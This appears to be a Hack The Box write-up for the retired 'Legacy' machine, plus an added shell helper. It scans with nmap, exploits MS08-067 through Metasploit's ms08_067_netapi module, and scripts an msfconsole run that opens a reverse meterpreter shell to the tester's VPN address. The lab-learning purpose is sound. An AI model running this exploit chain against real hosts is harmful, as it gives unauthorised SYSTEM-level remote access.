Legacy is the easiest Windows machine on HTB. My steps will not change, though, and I'll try to keep things as procedural as possible.
The [VIP] tag means that this machine is retired and no longer accessible without VIP status on HTB.
Index
- Enumeration
- Service exploitation
So, first step, enumeration. Always enumeration.
I have a simple procedure that I use on every machine. First, nmap across the full TCP range to discover every open port:
nmap -p- -T4 10.10.10.4 > portscan.txt
Next, take the ports that came back and run a full scan (-A: version detection, OS detection, default scripts and traceroute) against only those. This speeds up enumeration, since you are only probing ports you already know answer.
nmap -p 139,445,3389 -A -T4 10.10.10.4 > fullscan.txt
This gives us a lot of info. Two services show up on a Windows XP host:
- SMB (139/tcp and 445/tcp)
- ms-wbt-server (RDP, 3389/tcp)
Since the last one is on a closed port, SMB is the only thing left to try to exploit.
A quick Google search for Windows XP SMB vulnerabilities comes back with MS08-067, a stack overflow in the Server service's path canonicalization (netapi32) that gives unauthenticated remote code execution. The Server service runs as SYSTEM, so that is basically root.
There is a Metasploit module that will do the trick. You could exploit this manually, but why bother when a great tool does it faster? In the end, you are doing the same thing. The module fingerprints the target's OS and language to pick the right return address; a wrong target can crash the Server service and cost you the box, so leave it on Automatic Targeting unless that fails.
use exploit/windows/smb/ms08_067_netapi
So, we check the module's options, set the target host and our own VPN address for the reverse payload, and run the exploit.
We got a meterpreter session!
Now, run the shell command to drop from meterpreter into a Windows command prompt and navigate the file system to find the flags.
Navigate to C:\Documents and Settings\Administrator\Desktop and grab root.txt.
Don't forget to grab user.txt from C:\Documents and Settings\john\Desktop.
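The procedure above (full-range scan, targeted -A scan on what came back, then the Metasploit module) is easy to script. Here is an added helper that is not part of the original writeup: it parses nmap's grepable (-oG) output from the first scan, builds the second-stage command, and emits a resource file that replays the msfconsole steps. The -oG sample is constructed, not a real capture, and LHOST=tun0 is an assumption about the VPN interface name.

```shell
#!/bin/sh
# Added helper for the two-stage nmap scan and the Metasploit step.
# Parses nmap's grepable output, builds the targeted -A scan, and prints a
# resource file for exploit/windows/smb/ms08_067_netapi.

# Constructed -oG output for the Legacy host (not a real capture). The real
# scan produces this with: nmap -p- -T4 -oG portscan.gnmap 10.10.10.4
SAMPLE_GNMAP=$(printf 'Host: 10.10.10.4 ()\tStatus: Up\nHost: 10.10.10.4 ()\tPorts: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/closed/tcp//ms-wbt-server///\tIgnored State: filtered (65532)\n')

# open_ports GNMAP_TEXT: print a comma-separated list of ports in state "open".
# Ports nmap reports as closed (3389 here) answer with RST, so there is
# nothing for -A to probe and they are dropped.
open_ports() {
  printf '%s\n' "$1" | awk -F'Ports: ' '/Ports: /{
    n = split($2, f, ",")
    for (i = 1; i <= n; i++) {
      split(f[i], p, "/")        # e.g. 139/open/tcp//netbios-ssn///
      sub(/^ +/, "", p[1])       # strip the space that follows each comma
      if (p[2] == "open") out = (out == "" ? p[1] : out "," p[1])
    }
    print out
  }'
}

# targeted_scan_cmd GNMAP_TEXT TARGET: build the second-stage scan command.
targeted_scan_cmd() {
  printf 'nmap -p %s -A -T4 %s\n' "$(open_ports "$1")" "$2"
}

# msf_rc TARGET LHOST: print a resource file for `msfconsole -r`. Automatic
# Targeting is the module's default, so no `set TARGET` line is needed.
# LHOST as an interface name (tun0) is an assumption about your VPN setup.
msf_rc() {
  printf '%s\n' \
    'use exploit/windows/smb/ms08_067_netapi' \
    "set RHOSTS $1" \
    "set LHOST $2" \
    'set PAYLOAD windows/meterpreter/reverse_tcp' \
    'exploit'
}

# Demonstration on the constructed sample.
targeted_scan_cmd "$SAMPLE_GNMAP" 10.10.10.4
msf_rc 10.10.10.4 tun0
```

Against a live box you would feed the real portscan.gnmap into open_ports, run the command targeted_scan_cmd prints, then `msf_rc 10.10.10.4 tun0 > legacy.rc && msfconsole -q -r legacy.rc`. Once the session comes back, `shell` gets you the Windows prompt used for the flags.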
And we’re done.
Follow me on:
Twitter: https://twitter.com/caveeroo
Htb (Respect): https://bit.ly/2WzKgsC
Disclaimer: This article is only meant for educational purposes. Any action that derives from this article which isn’t meant for educational purposes is not, by any means, supported by the author.